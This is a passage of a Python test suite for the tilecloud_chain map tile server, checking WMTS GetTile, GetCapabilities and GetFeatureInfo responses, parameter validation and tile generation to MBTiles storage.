o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-nosns.yaml\",\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetTile\",\n \"Format\": \"image/png\",\n \"Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"11\",\n \"TileCol\": \"14\",\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.params[\"TileRow\"] = \"12\"\n assert isinstance(serve(), HTTPNoContent)\n\n request.params[\"TileRow\"] = \"11\"\n request.params[\"Service\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Service\"] = \"WMTS\"\n request.params[\"Request\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Request\"] = \"GetTile\"\n request.params[\"Version\"] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Version\"] = \"1.0.0\"\n request.params[\"Format\"] = \"image/jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Format\"] = \"image/png\"\n request.params[\"Layer\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Layer\"] = \"point_hash\"\n request.params[\"Style\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"Style\"] = \"default\"\n request.params[\"TileMatrixSet\"] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params[\"TileMatrixSet\"] = \"swissgrid_5\"\n del request.params[\"Service\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetCapabilities\",\n }\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n regex=True,\n expected=r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n <Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/all/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/line/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik</ows:Title>\n <ows:Identifier>mapnik</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid</ows:Title>\n <ows:Identifier>mapnik_grid</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik_grid/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>mapnik_grid_drop</ows:Title>\n <ows:Identifier>mapnik_grid_drop</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>application/utfgrid</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"application/utfgrid\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/mapnik_grid_drop/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.json\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_error</ows:Title>\n <ows:Identifier>point_error</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_error/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_hash_no_meta</ows:Title>\n <ows:Identifier>point_hash_no_meta</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash_no_meta/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point_px_buffer</ows:Title>\n <ows:Identifier>point_px_buffer</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_px_buffer/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon2</ows:Title>\n <ows:Identifier>polygon2</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n </Capabilities>\"\"\",\n )\n\n log_capture.check()\n\n def test_mbtiles_rest(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-serve.yaml\"\n \" -l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/mbtiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.mbtiles\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.matchdict = {\n \"path\": [\"wmts\", \"1.0.0\", \"point_hash\", \"default\", \"2012\", \"swissgrid_5\", \"1\", \"11\", \"14.png\"]\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.matchdict[\"path\"][7] = \"12\"\n response = serve()\n assert isinstance(response, HTTPNoContent)\n assert response.headers[\"Cache-Control\"] == \"max-age=28800\"\n\n request.matchdict[\"path\"][7] = \"11\"\n request.matchdict[\"path\"][1] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][1] = \"1.0.0\"\n request.matchdict[\"path\"][8] = \"14.jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][8] = \"14.png\"\n request.matchdict[\"path\"][2] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][2] = \"point_hash\"\n request.matchdict[\"path\"][3] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][3] = \"default\"\n request.matchdict[\"path\"][5] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"point_hash\", \"default\", \"swissgrid_5\", \"1\", \"14\", \"11.png\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test bsddb\")\n def test_bsddb_rest(self):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-bsddb.yaml\"\n \" -l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/bsddb/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.bsddb\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-bsddb.yaml\",\n }\n request.matchdict = {\n \"path\": [\"wmts\", \"1.0.0\", \"point_hash\", \"default\", \"2012\", \"swissgrid_5\", \"1\", \"11\", \"14.png\"]\n }\n serve = PyramidView(request)\n serve()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"image/png\")\n self.assertEqual(request.response.headers[\"Cache-Control\"], \"max-age=28800\")\n\n request.matchdict[\"path\"][7] = \"12\"\n assert isinstance(serve(), HTTPNoContent)\n\n request.matchdict[\"path\"][7] = \"11\"\n request.matchdict[\"path\"][1] = \"0.9\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][1] = \"1.0.0\"\n request.matchdict[\"path\"][8] = \"14.jpeg\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][8] = \"14.png\"\n request.matchdict[\"path\"][2] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][2] = \"point_hash\"\n request.matchdict[\"path\"][3] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"][3] = \"default\"\n request.matchdict[\"path\"][5] = \"test\"\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"point_hash\", \"default\", \"swissgrid_5\", \"1\", \"14\", \"11.png\"]\n self.assertRaises(HTTPBadRequest, serve)\n\n request.matchdict[\"path\"] = [\"wmts\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n request.matchdict[\"path\"] = [\"static\", \"1.0.0\", \"WMTSCapabilities.xml\"]\n PyramidView(request)()\n self.assertEqual(request.response.headers[\"Content-Type\"], \"application/xml\")\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n CAPABILITIES,\n regex=True,\n )\n\n log_capture.check()\n\n def test_serve_gfi(self) -> None:\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n \"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"11\",\n \"TileCol\": \"14\",\n \"I\": \"114\",\n \"J\": \"111\",\n }\n serve = PyramidView(request)\n serve()\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n request = DummyRequest()\n request.registry.settings = {\n \"tilegeneration_configfile\": \"tilegeneration/test-serve.yaml\",\n }\n request.matchdict = {\n \"path\": [\n \"wmts\",\n \"1.0.0\",\n \"point_hash\",\n \"default\",\n \"2012\",\n \"swissgrid_5\",\n \"1\",\n \"11\",\n \"14\",\n \"114\",\n \"111.xml\",\n ]\n }\n request.params = {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n \"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"14\",\n \"TileCol\": \"11\",\n \"I\": \"114\",\n \"J\": \"111\",\n }\n serve = PyramidView(request)\n serve()\n self.assert_result_equals(\n request.response.body.decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n def test_wsgi(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-serve.yaml \"\n \"-l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/mbtiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[(\"point_hash/default/2012/swissgrid_5.png.mbtiles\")],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\nNb generated metatiles: 1\nNb metatiles dropped: 0\nNb generated tiles: 64\nNb tiles dropped: 62\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n server.pyramid_server = None\n server.tilegeneration = None\n serve = app_factory({}, configfile=\"tilegeneration/test-serve.yaml\")\n\n global code, headers\n code = None\n headers = None\n\n def start_response(p_code, p_headers):\n global code, headers\n code = p_code\n headers = {}\n for key, value in p_headers:\n headers[key] = value\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\n \"QUERY_STRING\": \"&\".join(\n [\n \"{}={}\".format(*item)\n for item in {\n \"Service\": \"WMTS\",\n \"Version\": \"1.0.0\",\n \"Request\": \"GetFeatureInfo\",\n \"Format\": \"image/png\",\n \"Info_Format\": \"application/vnd.ogc.gml\",\n \"Layer\": \"point_hash\",\n \"Query_Layer\": \"point_hash\",\n \"Style\": \"default\",\n \"TileMatrixSet\": \"swissgrid_5\",\n \"TileMatrix\": \"1\",\n \"TileRow\": \"11\",\n \"TileCol\": \"14\",\n \"I\": \"114\",\n \"J\": \"111\",\n }.items()\n ]\n )\n },\n start_response,\n )\n self.assertEqual(code, \"200 OK\")\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n result = serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\n \"QUERY_STRING\": \"\",\n \"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/14/11/114/111.xml\",\n },\n start_response,\n )\n self.assert_result_equals(\n result[0].decode(\"utf-8\"),\n \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<msGMLOutput\n xmlns:gml=\"http://www.opengis.net/gml\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n</msGMLOutput>\n\"\"\",\n )\n\n serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", \"PATH_INFO\": \"/wmts/1.0.0/point_hash/default/2012/swissgrid_5/1/11/12.png\"},\n start_response,\n )\n self.assertEqual(code, \"204 No Content\")\n\n serve(\n server.tilegeneration.get_main_config(),\n \"tilegeneration/test-serve.yaml\",\n {\"QUERY_STRING\": \"\", 